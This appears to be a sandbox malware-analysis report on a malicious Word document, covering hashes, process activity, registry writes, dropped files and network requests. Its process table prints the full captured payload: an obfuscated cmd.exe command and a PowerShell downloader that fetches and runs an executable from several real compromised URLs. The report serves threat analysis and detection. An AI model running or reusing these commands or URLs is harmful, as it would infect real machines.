| File name: | eb9ad5bcd11c4e92e686d8f464ebca05f43ea16d123414c0fffcad88dd8fd5b1 |
| Full analysis: | https://app.any.run/tasks/3eccc753-144d-42dd-8a10-99279ab20111 |
| Verdict: | Malicious activity |
| Analysis date: | July 18, 2019, 06:39:39 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/msword |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: James-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 3 22:03:00 2018, Last Saved Time/Date: Wed Oct 3 22:03:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 31, Security: 0 |
| MD5: | C0B61D9AEB83F0C859A858E6699F1256 |
| SHA1: | 69871036BD44D60177D330972B99329C4B744D11 |
| SHA256: | EB9AD5BCD11C4E92E686D8F464EBCA05F43EA16D123414C0FFFCAD88DD8FD5B1 |
| SSDEEP: | 1536:XptJlmrJpmxlRw99NBp+aVKBADqAoeNQ+Au9nCMhoIsSQjZ8HHiQAt:5te2dw99fCWn5N32xKiQA |
MALICIOUS
Unusual execution from Microsoft Office
- WINWORD.EXE (PID: 3868)
Executes PowerShell scripts
- cmd.exe (PID: 2200)
Starts CMD.EXE for commands execution
- WINWORD.EXE (PID: 3868)
Request from PowerShell which ran from CMD.EXE
- powershell.exe (PID: 1812)
SUSPICIOUS
Creates files in the user directory
- powershell.exe (PID: 1812)
Executes application which crashes
- powershell.exe (PID: 1812)
INFO
Creates files in the user directory
- WINWORD.EXE (PID: 3868)
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 3868)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .doc | | | Microsoft Word document (54.2) |
|---|---|---|
| .doc | | | Microsoft Word document (old ver.) (32.2) |
EXIF
FlashPix
| Title: | - |
|---|---|
| Subject: | - |
| Author: | James-PC |
| Keywords: | - |
| Comments: | - |
| Template: | Normal.dotm |
| LastModifiedBy: | - |
| RevisionNumber: | 1 |
| Software: | Microsoft Office Word |
| TotalEditTime: | - |
| CreateDate: | 2018:10:03 21:03:00 |
| ModifyDate: | 2018:10:03 21:03:00 |
| Pages: | 1 |
| Words: | 5 |
| Characters: | 31 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| Company: | - |
| Lines: | 1 |
| Paragraphs: | 1 |
| CharCountWithSpaces: | 35 |
| AppVersion: | 16 |
| ScaleCrop: | No |
| LinksUpToDate: | No |
| SharedDoc: | No |
| HyperlinksChanged: | No |
| TitleOfParts: | - |
| HeadingPairs: |
|
| CompObjUserTypeLen: | 32 |
| CompObjUserType: | Microsoft Word 97-2003 Document |
Total processes
41
Monitored processes
4
Malicious processes
2
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1812 | powershell $Vzd=new-object Net.WebClient;$LRt='http://localbusinesspromotion.co.uk/nk@http://www.jacksonvillewaterdamage.org/c1DPlXt@http://alamotransportph.com/bqsUtTpY@http://www.alemranakanda.com/9@http://junkking.ca/r0t6fGs9'.Split('@');$cuo = '309';$moj=$env:public+'\'+$cuo+'.exe';foreach($rSV in $LRt){try{$Vzd.DownloadFile($rSV, $moj);Invoke-Item $moj;break;}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2200 | cmd /V^:/C"^s^e^t ^7^a^Q=^q^|^h^ ^sc^Y^ ^_^<^B^ ^H^P^'^ ^7^Bl^ ^8n^'^ ^zN^X^ ~^a^=^ Vn^K^ ^3^.^A^ N^I^|^ a^9^l^ ^E^=^k^ ^p^x^8^ ^.^P^&^ ^>^a^Q^ ^Jq)^ r^m^}^}cC^ ^}^s^@^{^{^,^4^t^h^S^6^\c^2^j^+^t^a^F^|^a^KN^:c^4^1^I^}^J^g^_^;^s^bnk^@^U^[^a^M^A^He^u^'^Ur)^yu^b^.^&^_^;^0n^F^jt^G-^o%v^Y^m;F^T^$^B^>^:^ ^i^z^9^m^O^k^a^e^g^'^Xtv^K^x^I^PC^p^-^*(^x^e9a^ ^k^8^X[^o^f^z^{v^ktvn^o)^P^I^f^bC^;^E^ ^*)^'^o^s^jN^t%^o^P^IC^m^Ek^_^$^I^f^b ^S^g^ ^,^F^`0V^]^f^Y^S^I^UPr%^i^J^$c^`^Y(^A^x^P^e^9^M^X^l^t^s^?^i^_^Sn^F^d^y#^d^&^ ^w^a^Y^>^?^o^TC^]^l^L^A^Hn^W^9^J^w^i^3^W^o^#^1^k^Dv)^b^.vC^H^d^@^J^x^z^T^M^<V^'^sX^$^|^$^=^{^6^8^z^y^IR^Dr^H^L^]^t^'^Q^9^{P~^U)^D^S^0^t^Z^~^JR^uG^8^L^w^T^X^$^P^q}^ ^6(^\n^8^`^;^i^|^;^5^ ^`^l^>V^Qs^D^S^_^$^.r^u^ n^$^K^Q^&(Y^u^=^h^{^?Vc^#^\p^a^P^ ^s^e^k^#^Fr^3(^O^o^a^ ^o^f^'^$^B^;^&bJ^'^wRv^e^6%r^x^ %^de^x^K^`^.r^F^-^'^D^U^?^+^z^@8^o^u^j^1^u^8^s^qc)(C^$^I^2^l^+^4^oR^'^O^,n^\R^$^K^'V^I/^+^D^;zcK^AL^i^*^[^i^l^:\%^b^ C^-^u^M^&^P^p^8^xR^:^[^I^hv^G^'^\n^<^o^d^e^9^k^D^$^y)^M=^g^G^d^j^M^#^Q^o^K^>^9^mo^>^M^$^~v^s^;e^W^i^'^U^Qd^9^yC^+^0^Jn^U^3^Kn^:^'%^g^Q ^?^4^O^=^p^FC^ nq^E^o^q^3^Xu^s^T^ycr^1N^$n^?^o^;^0^D^3)^6^P^w^'^K^f^.^@^A^Z^}^'^X^5*(^h(N^t^i^Gr^i^p^|Y^l^Z^m^f^p^h^J^A^Sv^k^4^.^me^5'^f^+^D^9^|_^W^s^9^0^=^G^8^y^g^f^Za^.^6^]^q%^t^&^B^0^0T^Inr^T^#^B/^HC^&a^U^i^,c^i^@^y^.^w^$^1^g^Z^?^jn^[^W^S^inR^h^km^4^p^k^`^kVn^t(^I^u^+^P^?^j^U^:^X/^<^Z^g/^Za^ ^:^*^_^@^p)^4^B^tv^m;^t^w^o^E^h^P^Q^u^@^[^y^`^9^4)^5/^ ^A^'^m^9^'^A^o^L#^~c^A^q^{^.^?^\^K^a^ 6^=^d^:^6^~n^H^<^h^a^@^o^D^k^&^j^w^a^`^,^en^@^=^_^a+^a^Tr9^g^{^mQ_^s^e^G^Q^$^l^@^F^q^a^`^a^@^.}c^+^w^B^S^2^w^l^2^p^w^?^k[/^\C^b/G^*^+^:^L^Sv^p^*/r^t^S^1%^t^$^O^0^h^a^j^{^@C^L^P^Y^e^2^W^p^K^sN^T^1^;^[^t^+^lR^U^u^0^x^s^L0^,^q^}N^e^b^4^K^O/n^g^l^m^m^2^B^o^p^$^jc^b^G^-^.^F^>^6^h^;^6/p^KR^O^t^$^a^er$/^w^o^#^P^E^p^M^x^'^s^q^F^On^F^2^s^a^\^*^]rV2^1^t^.}^D^o^S^L^I^mC^p^4^a^&^o^1^l^\ ^Ia^[+^z/^,^_^'/^4^1^P^:C^=^Q^p^d^p^>^tn^.^x^t^A^H^`^h^>^=n^@^t^A^f^tc%^s^X^$^8^Q^l^'^`^X^P^F^XN^D^x^:^[^1^a5)c^p^t^$/^s^X]^g^=^0^Mr^h^&^U^o^hX^T^.^Z^}m^eBc^ ^g^a^K^B^a^j^u^*^m^'^I^i^a^Y^z^l^d^@^L^<r^+^j^;^e^b^=^;^t^M^p^0^a^wn^Y^w^Bc^S^e^=^W^d^l^]q^_l^7^{^G^i^z^P^jv^#^u^5n^D^I^+^o^o^*(^s^t^X^A^k^M^+^pc^b^U)^a^@)^5^j^l^0^3^.R/%^w^y^k^0^w^6^@^|^w^j%^h/^b^YR/^Q^8^x^:^1^6^3^p^Z^X^&^t^z^KL^t^#^y^m^h^,^1^4^@^3^H^+^k^6(^En^$^m^q/^#^1^D^kB^on^u^q^k^D^.^w^|^8^oc^5^gc^+^9^D^.R^f^5n^o^j^|^o^U^a^7^i^ *c^t^Bb^]^o[^s^e^m^I^4^T^o^|n^5rR^0Cp/bm^s^W^t^I^s^'^P^o^e^9^;%n^h^d^+^i^e^b^Z^s^o*^3^u^k^'^}^b^y^G^:^l^I^F/^a^us^Oc^K^I^#^o^\^JR^l(^G^T/^kNE/N^$^9^:^H^T^7^p^*^o^T^t^U^5^\^t^?^J/^h^y^_^5^'^.C^]^=^Y^E$^t%^p^{R^W^\^i^L^A^.^&^$^o^u^x^;^f^L^J^t^*^-^}n^d^;^g^e^U^$^aiR^1^`l^ln^7C^g^[^ ^b^7^G^o^e^{R^H^W^7^i^E^.^W^T^p^t^B^3^d^e^_c^4N^E^6^1^ ^4^l^z^t^X^0Vc^6^?^E^ec^5^j^j^L^>^w^b%^Q^A^o^Q^F^w-^S^W^#^w^@^~^O^e^i^<^sn^e^#^g^=^<^g^;^d^8R^e^z^~^S^PV^Er)^$n-^<^ ^x^~^0^l^&^}^o^l^tw^S^e^@^yJ^h^g_^[^sc^X^Tr^B^d^U^eC^G^E^w^-Vv^o^+^&^j^p&&^for /^L %^U ^in (^1^56^7^;^-^4^;^3)^d^o ^s^e^t v^E=!v^E!!^7^a^Q:~%^U,1!&&^i^f %^U ^l^e^q ^3 c^a^l^l %v^E:^~^-^3^9^2%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2528 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 3221225477 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3868 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\eb9ad5bcd11c4e92e686d8f464ebca05f43ea16d123414c0fffcad88dd8fd5b1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 Modules
| |||||||||||||||
Total events
1 292
Read events
893
Write events
394
Delete events
5
Modification events
| (PID) Process: | (3868) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | >7= |
Value: 3E373D001C0F0000010000000000000000000000 | |||
| (PID) Process: | (3868) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (3868) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (3868) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1324482590 | |||
| (PID) Process: | (3868) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1324482704 | |||
| (PID) Process: | (3868) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1324482705 | |||
| (PID) Process: | (3868) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 1C0F0000EA93489C333DD50100000000 | |||
| (PID) Process: | (3868) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | h8= |
Value: 68383D001C0F000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3868) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | h8= |
Value: 68383D001C0F000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (3868) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
Executable files
0
Suspicious files
2
Text files
1
Unknown types
2
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF7BE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 1812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NOJEAY72ZZOT73DV1RZ9.temp | — | |
MD5:— | SHA256:— | |||
| 2528 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsFEA.tmp | — | |
MD5:— | SHA256:— | |||
| 2528 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scsFEB.tmp | — | |
MD5:— | SHA256:— | |||
| 3868 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$9ad5bcd11c4e92e686d8f464ebca05f43ea16d123414c0fffcad88dd8fd5b1.doc | pgc | |
MD5:— | SHA256:— | |||
| 1812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe04af.TMP | binary | |
MD5:— | SHA256:— | |||
| 3868 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:— | SHA256:— | |||
| 1812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:— | SHA256:— | |||
| 1812 | powershell.exe | C:\Users\Public\309.exe | html | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
2
DNS requests
2
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1812 | powershell.exe | GET | 301 | 198.48.62.1:80 | http://www.jacksonvillewaterdamage.org/c1DPlXt | US | — | — | unknown |
1812 | powershell.exe | GET | 301 | 66.206.38.173:80 | http://localbusinesspromotion.co.uk/nk | US | html | 247 b | malicious |
1812 | powershell.exe | GET | 404 | 66.206.38.173:80 | http://localbusinesspromotion.co.uk/nk/ | US | html | 48.2 Kb | malicious |
1812 | powershell.exe | GET | 200 | 198.48.62.1:80 | http://www.jacksonvillewaterdamage.org/ | US | html | 30.9 Kb | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1812 | powershell.exe | 66.206.38.173:80 | localbusinesspromotion.co.uk | Turnkey Internet Inc. | US | malicious |
1812 | powershell.exe | 198.48.62.1:80 | www.jacksonvillewaterdamage.org | Turnkey Internet Inc. | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
localbusinesspromotion.co.uk |
| malicious |
www.jacksonvillewaterdamage.org |
| unknown |